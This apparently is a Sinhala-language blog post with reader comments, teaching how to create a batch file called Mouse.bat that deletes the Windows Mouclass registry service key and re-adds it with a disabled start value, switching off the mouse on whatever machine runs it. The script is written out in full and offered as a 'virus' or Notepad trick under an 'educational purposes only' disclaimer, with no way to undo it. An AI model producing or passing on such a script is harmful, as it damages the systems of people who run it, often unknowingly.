
හරි එහෙනම් වැඩේ පටා...න් ගමු නේද.එහෙනම් වෙනදා වගේ Notepad එක Open කරගෙන වැඩේට ලෑස්ති වෙන්න්කෝ.
01.මුලින්ම Notepad එක Open කරගන්න දන්නැත්තම් මෙහෙම යන්න. Start-Allprogarm-Accessories-Notepad
02.දැන් මං පහලින් දාලා තියෙන Code ටික Notepad එකට Copy/past කරන්න.
03.දැන් Save as ගිහින් Mouse.bat කියල ගහලා Save කරගන්න.
04.අන්තිමට .bat කියලා ගහන්න ඕනි.Mouse කියන තැනට ඕයාලා කැමති නමක් දාගෙන Save කරගන්න.
මෙන්න කෝඩ් ටික
rem ---------------------------------
rem Disable Mouse
set
key="HKEY_LOCAL_MACHINE\system\CurrentControlSet\Services\Mouclass"
reg delete %key%
reg add %key% /v Start /t REG_DWORD /d 4
rem ---------------------------------
(මේ සියලුම දෙවල් අධ්‍යාපනය සදහා පමනි...)
ela ela top mcn...
ReplyDeletemewa vitus newei vb scrips vitharane virus kiyana nama mrwata danna epa.
ReplyDeleteමේක කෙටියෙන්ම කිව්වොත් Notepad Trick එකක්.මේකෙන් වෙන්නේ Mouse එක Disable
වෙන එක ඉතිං මං හිතුවා ''Virus'' යන වචනය දැම්මෙත් වඩාත් උචිතයි කියලා ඔයා ඒක වෙන විදිහකට තේරුම් අරන් ඇති බව උඩ Comment
එක දැක්කම පේනවා.මොනා උනත් අදහස් දැක්වුවාට ස්තූති..!
Delete